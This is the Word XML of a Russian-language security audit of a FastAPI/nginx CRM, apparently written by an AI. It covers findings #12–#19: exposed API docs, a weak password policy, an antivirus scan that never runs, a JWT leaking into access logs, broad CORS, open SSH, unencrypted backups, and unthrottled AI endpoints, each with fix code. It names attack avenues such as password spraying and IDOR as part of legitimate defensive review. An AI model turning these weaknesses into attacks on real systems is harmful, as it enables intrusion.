              <w:t xml:space="preserve">P2 · Средний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Область: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Backend · FastAPI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Где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/app/main.py:100-103 (docs_url="/docs", redoc_url="/redoc", openapi_url=".../openapi.json")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Swagger UI и ReDoc открыты на проде без авторизации. Это упрощает разведку: атакующий получает полный список эндпоинтов, схем запроса/ответа, кодов ошибок.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Из коробки никакой утечки чувствительных данных — но это сильно ускоряет автоматизацию атак (fuzzing форм, поиск IDOR).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Почему это опасно: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Публичный API contract = карта для атакующего.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Особенно полезен в сочетании с #2 (IDOR на download): атакующему сразу видно все entity-эндпоинты.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 исправить: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Отключать docs/redoc/openapi.json в проде или закрывать basic-auth на nginx уровне.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="4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Было: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app = FastAPI(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docs_url="/docs",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redoc_url="/redoc",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openapi_url=f"{settings.api_v1_prefix}/openapi.json",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)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before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Стало: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is_prod = settings.env == "prod"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app = FastAPI(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docs_url=None if is_prod else "/docs",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redoc_url=None if is_prod else "/redoc",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openapi_url=None if is_prod else f"{settings.api_v1_prefix}/openapi.json",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#13  Слабая политика паролей, тихая обрезка bcrypt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6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292F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P2 · Средний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Область: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Backend · auth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Где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/app/core/security.py:23-28 (_truncate без warning), backend/app/modules/users/schemas.py:30,80 (только min_length=8)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Минимальная длина пароля — 8 символов; нет проверки на сложность (цифра/регистр/символ), на словарные пароли (например, "password"), на повторное использование. Bcrypt молча режет пароль до 72 байт — пользователь не знает, что его «длинный» пароль усечён.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 сочетании с тем, что lockout по email сработает только при 5 неудачах за 15 минут, классическая атака password-spraying по списку email-ов и топ-100 паролей пройдёт.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 исправить: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Поднять min_length до 12, добавить проверку на наличие пробела/нелатинских/цифр (по zxcvbn-score было бы идеально), warning-я для паролей длиннее 72 байт.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Заодно: при активации invite отзывать все существующие refresh-токены пользователя (на случай compromised invite-flow).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="4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Было: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password: str | None = Field(default=None, min_length=8)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...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password: str = Field(min_length=8, max_length=128)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before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Стало: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def _validate_password(v: str) -&gt; str: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if len(v) &lt; 12: raise ValueError("min 12 chars")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if v.encode("utf-8").__len__() &gt; 72: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    raise ValueError("bcrypt не примет больше 72 байт")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score = zxcvbn(v)["score"]  # 0..4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if score &lt; 3: raise ValueError("слишком простой пароль")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return v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#14  Антивирус-проверка файлов не реализована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6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292F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P2 · Средний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Область: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Backend · файлы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Где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/app/modules/files/service.py:77 (scan_status=ScanStatus.pending), backend/app/modules/files/models.py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При confirm-загрузке scan_status проставляется pending, но никакой задачи на скан не создаётся (ClamAV/Yandex-AV) — файл сразу же отдаётся через presigned URL. Поле scan_status фактически декоративное.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Почему это опасно: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CRM рассылает резюме/договоры внутри компании. Один заражённый файл от внешнего источника (партнёра/кандидата) → массовая компрометация рабочих станций.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 исправить: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Подключить ClamAV (через сайдкар-контейнер). Celery-таска, которая после S3-confirm дёргает clamd на скачанном байт-стриме, обновляет scan_status в БД (clean/infected) и публикует realtime-событие. На время pending download уже сейчас отдавать 425 Too Early вместо presigned URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before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Было: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# никакой задачи скана нет, scan_status навсегда остаётся pending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# download_url отдаёт presigned URL для всех, кроме infected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before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Стало: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# 1) celery-таска scan_file_task(file_id)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# 2) после confirm — db.commit() + tasks.scan_file_task.delay(rec.id)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# 3) download_url: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if file.scan_status == ScanStatus.pending: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raise ApiError(425, "scan_pending", "Файл сканируется, подождите 1-2 мин.")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if file.scan_status == ScanStatus.infected: raise ApiError(409, ...)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#15  JWT в query-параметре WebSocket попадает в access-логи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6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292F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P2 · Средний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Область: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Backend (realtime) + Infra (nginx)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Где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/app/api/v1/endpoints/realtime.py:67-75 (?token=&lt;jwt&gt;); infra/nginx.example.conf:42-53 (proxy_pass без log-фильтра)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Access-токен передаётся в query: ws://.../ws/events?token=eyJ.... nginx по умолчанию пишет полный URL в access.log; access-токены живут 15 минут, но при ротации логов попадают в архив бессрочно. Любой, кто читает access.log (devops, SIEM-агент, утекший бэкап логов), получает рабочий токен.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Почему это опасно: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Защищённый WS-handshake — известная проблема: браузер не умеет ставить Authorization-заголовок при ws-handshake. Стандартное решение — короткоживущий «ticket»-токен (POST /auth/ws-ticket → одноразовый id → в query вместо jwt).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 исправить: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Заменить ?token=&lt;jwt&gt; на ?ticket=&lt;one-time-id&gt;. /auth/ws-ticket выдаёт одноразовый id, который кладётся в Redis с TTL 30 сек и привязывается к user_id. WS-handshake читает ticket, по нему достаёт user_id, ticket из Redis удаляется. JWT не светится в логах.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Альтернатива побыстрее: в nginx скрыть query из логов через log_format custom_combined без $args.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#16  CORS allow_credentials=True + allow_methods/headers="*"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6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292F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P3 · Низкий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Область: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Backend · CORS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Где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/app/main.py:106-112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Origins whitelist строгий (ru-staging/prod), но при любой регрессии (например, добавили "*" в .env.prod для дебага) сразу же получаем полностью открытый CORS с credentials. Лучше явно перечислять методы и заголовки.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 исправить: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Явно перечислить allow_methods и allow_headers, добавить run-time assert: если в cors_origins есть "*" и env=prod — RuntimeError.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before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Стало: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assert "*" not in settings.cors_origins or settings.env != "prod", \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"CORS wildcard в проде запрещён"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app.add_middleware(CORSMiddleware,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allow_origins=settings.cors_origins,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allow_credentials=True,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allow_methods=["GET","POST","PATCH","PUT","DELETE","OPTIONS"],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allow_headers=["Authorization","Content-Type","X-Client-Id"],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#17  SSH открыт во весь интернет (0.0.0.0/0)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6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292F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P3 · Низкий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Область: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Infra · Terraform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Где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">infra/terraform/main.tf:100-105 (yandex_vpc_security_group ingress SSH)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Security group разрешает SSH с любого IP. При ключевой авторизации это приемлемо, но создаёт стабильную поверхность для брутфорса/сканеров.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 исправить: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Сузить v4_cidr_blocks SSH до admin-IP или подсети VPN/бастиона. Альтернатива — Yandex IAP (TCP-tunnel).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before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Стало: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variable "admin_cidrs" { type = list(string) }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...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ingress { description = "SSH"; protocol = "TCP"; port = 22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v4_cidr_blocks = var.admin_cidrs }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#18  Бэкапы БД без client-side encryption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6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292F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P3 · Низкий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Область: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Infra · backup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Где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/scripts/backup_db.sh:51-72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Дампы заливаются в S3 в gzip-ом виде. Yandex Object Storage шифрует at-rest, но любой, кто получил S3-ключ из .env.prod, скачивает чистый дамп. Это same level доступа, что и БД — но в проде хочется отдельный слой защиты для backup-supply-chain.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 исправить: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Шифровать дамп GPG/age-ключом перед заливкой; приватный ключ держать вне VM (например, в YC Lockbox или у DBA). Восстановление потребует ключ, утечка ключей S3 ничего не даёт атакующему.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before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Стало: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pg_dump ... | gzip -9 | age -r "$BACKUP_AGE_RECIPIENT" &gt; "$DUMP_PATH.age"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:after="0" w:line="26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aws s3 cp "$DUMP_PATH.age" "s3://.../crm-lg-${TS}.dump.gz.age" ...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#19  AI-эндпоинты без rate-limit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6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292F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P3 · Низкий</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="71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Область: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Backend · AI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Где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/app/api/v1/endpoints/vacancies.py:100-151, candidates.py:108-167, 370-427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Описание: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POST /vacancies/parse-text, /candidates/parse-resume-text и /candidates/{id}/resume/improve ходят в YandexGPT (платный) и принимают до 40k символов на вход. Любой авторизованный пользователь может вызвать их в цикле и сжечь YC-баланс / упереть в дневной квот лимит.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 исправить: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Поставить per-user rate-limit (например, 30 запросов/час) через Redis-счётчик, такой же как _hit_rate_limit в auth.store. Опционально: лимит на одного пользователя и общий budget-cap по folder_id.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Приложения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A. Что НЕ нашлось проблемного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Список проверенных и признанных безопасными элементов — чтобы не возвращаться к ним в следующих аудитах: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SQL-инъекций нет. Все запросы построены через SQLAlchemy с параметризацией; единственные использования text() — server_default (uuid_generate_v4(), now()), не зависящие от пользовательского ввода. Полнотекстовый поиск по чату идёт через func.websearch_to_tsquery() — параметризовано.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Refresh-токен: httpOnly + Secure + SameSite=strict + path=/api/v1/auth + ротация на каждом /refresh + whitelist по sha256(token) в Redis. Хорошо.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Access-токен живёт только в zustand-store, не в localStorage. Хорошо для refresh; для access — компромисс, который усиливается короткой жизнью.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Bcrypt с gensalt и адекватной обработкой 72-байтового лимита (с замечанием в #13 на silent-truncation).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Lockout по email (5 неудач × 15 мин) реализован. Rate-limit по IP реализован, но обходим через X-Forwarded-For (см. #5).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Invite-токены: сырой токен с 256-битной энтропией (secrets.token_urlsafe(32)), хранится sha256-хэш, expires_at + used_at — корректно для одноразовости.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S3-bucket ACL=private, presigned-POST с Content-Type и content-length-range, presigned-GET с TTL 300с — корректно.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Postgres и Redis не публикуют порты наружу (только expose) — хорошо.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HSTS, X-Frame-Options=DENY, X-Content-Type-Options=nosniff, Referrer-Policy=strict-origin-when-cross-origin — выставлены (но без CSP, см. #10).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B. Что осталось за периметром аудита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Динамический pentest (DAST): этот аудит — статический code review. Рекомендуется прогнать ZAP или Burp в режиме authenticated-scan по staging.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Аудит зависимостей (SCA): pinned-версий нет в pyproject.toml (только &gt;=). Стоит прогнать pip-audit/safety + npm audit и закрепить версии lockfile-ом.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Социальная инженерия и доменно-почтовые проверки (SPF/DKIM/DMARC) — кратко: настроить DMARC=quarantine для lachevsky.group.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Резервное копирование секретов: подразумевается, что .env.prod лежит только на VM; стоит документировать процедуру ротации JWT_SECRET и S3-ключей.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CRM-LG · Security Audit · </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="64748B"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">стр.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из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F17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CRM-LG Security Audit</dc:title>
  <dc:creator>Claude · Security Audit</dc:creator>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-27T23:12:22.173Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-27T23:12:22.173Z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